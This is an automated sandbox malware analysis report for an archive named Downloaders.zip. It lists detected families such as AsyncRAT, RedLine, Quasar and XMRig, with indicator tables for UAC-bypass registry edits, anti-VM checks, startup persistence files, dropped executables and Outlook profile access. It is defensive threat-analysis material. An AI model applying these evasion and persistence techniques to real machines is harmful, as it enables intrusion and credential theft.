Malware Analysis Report

2025-01-03 06:22

Sample ID 241127-awglgstrbm
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
asyncrat lokibot quasar redline sectoprat socks5systemz stormkitty xmrig xred xworm 25072023 default newbundle2 office04 backdoor botnet collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation pyinstaller rat spyware stealer themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

asyncrat lokibot quasar redline sectoprat socks5systemz stormkitty xmrig xred xworm 25072023 default newbundle2 office04 backdoor botnet collection credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation pyinstaller rat spyware stealer themida trojan upx

Asyncrat family

Lokibot family

Xmrig family

Quasar family

Detect Socks5Systemz Payload

Xred family

Suspicious use of NtCreateUserProcessOtherParentProcess

Xworm family

Quasar payload

XMRig Miner payload

Redline family

Xworm

Quasar RAT

Sectoprat family

Xred

RedLine payload

Socks5systemz family

Socks5Systemz

Process spawned unexpected child process

Lokibot

Contains code to disable Windows Defender

AsyncRat

RedLine

SectopRAT

SectopRAT payload

UAC bypass

StormKitty payload

Suspicious use of NtCreateProcessExOtherParentProcess

StormKitty

xmrig

Detect Xworm Payload

Stormkitty family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Async RAT payload

Command and Scripting Interpreter: PowerShell

Sets service image path in registry

Sets file to hidden

Indicator Removal: Network Share Connection Removal

Creates new service(s)

Contacts a large (1989) amount of remote hosts

Downloads MZ/PE file

Blocklisted process makes network request

Stops running service(s)

Checks BIOS information in registry

Executes dropped EXE

Themida packer

Identifies Wine through registry keys

Loads dropped DLL

ACProtect 1.3x - 1.4x DLL software

Drops startup file

Checks computer location settings

Reads user/profile data of local email clients

Reads user/profile data of web browsers

Reads data files stored by FTP clients

Unsecured Credentials: Credentials In Files

Reads WinSCP keys stored on the system

Unexpected DNS network traffic destination

Adds Run key to start application

Checks whether UAC is enabled

Checks installed software on the system

Network Share Discovery

Enumerates connected drives

Accesses Microsoft Outlook profiles

Network Service Discovery

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Indicator Removal: File Deletion

Power Settings

Suspicious use of NtSetInformationThreadHideFromDebugger

UPX packed file

Drops file in System32 directory

Enumerates processes with tasklist

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

System Network Configuration Discovery: Internet Connection Discovery

Access Token Manipulation: Create Process with Token

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Program crash

Command and Scripting Interpreter: JavaScript

Embeds OpenSSL

Browser Information Discovery

System Network Configuration Discovery: Wi-Fi Discovery

NSIS installer

Suspicious behavior: GetForegroundWindowSpam

NTFS ADS

Suspicious use of SendNotifyMessage

Runs net.exe

outlook_office_path

Delays execution with timeout.exe

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Opens file in notepad (likely ransom note)

Modifies data under HKEY_USERS

Modifies registry class

Runs ping.exe

Enumerates system info in registry

Discovers systems in the same network

outlook_win_path

Detects videocard installed

Checks SCSI registry key(s)

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-27 00:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-27 00:33

Reported

2024-11-27 00:45

Platform

win10ltsc2021-20241023-en

Max time kernel

646s

Max time network

711s

Command Line

winlogon.exe

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Socks5Systemz Payload

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lokibot

trojan spyware stealer lokibot

Lokibot family

lokibot

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbem\wmiprvse.exe

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socks5Systemz

botnet socks5systemz

Socks5systemz family

socks5systemz

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\rh.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\L.exe N/A

Contacts a large (1989) amount of remote hosts

discovery

Creates new service(s)

persistence execution

Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\net.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe N/A

Stops running service(s)

evasion execution

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\LB31.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\Mig\Mig.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\L.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\rh.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\rh.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\LB31.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\Mig\Mig.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\L.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\taskhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\._cache_System.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\IMG001.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\OneDrive.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\frap.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\0fVlNye.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\Opdxdyeul.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\PctOccurred.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\System.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Files\av_downloader1.1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\caspol.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\iazsfn.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\Desktop\Files\._cache_System.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\Desktop\Files\._cache_System.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url C:\Windows\SYSTEM32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url C:\Windows\SYSTEM32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\fHR9z2C.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\built.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\stail.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\windowsexecutable.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Client_protected.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\filer.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\AmLzNi.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\xxz.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\Xworm%20V5.6.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\XClient.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\333.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\VBVEd6f.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test12.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test6.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test14.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\taskhost.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\pantest.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test9.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test10-29.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test19.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test10.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test_again4.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test23.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test5.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test11.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test20.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test_again3.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test16.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test13.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test_again2.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test15.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test18.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test21.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test22.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test8.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test7.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test-again.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\test17.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\vg9qcBa.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\vg9qcBa.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\vg9qcBa.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\vg9qcBa.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\LoadNew.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\OneDrive.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\25072023.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\PctOccurred.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\crypted8888.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\win.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine C:\Users\Admin\Desktop\a\rh.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine C:\Users\Admin\Desktop\a\L.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VS7FV.tmp\stail.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Lerry Video 22.0.1000\lerryvideo.exe N/A
N/A N/A C:\Users\Admin\Desktop\Files\Armanivenntii_crypted_EASY.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A
N/A N/A C:\ProgramData\Synaptics\Synaptics.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 45.155.250.90 N/A N/A

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\Desktop\a\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\Desktop\a\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\Desktop\a\caspol.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Desktop\Files\v7wa24td.exe N/A
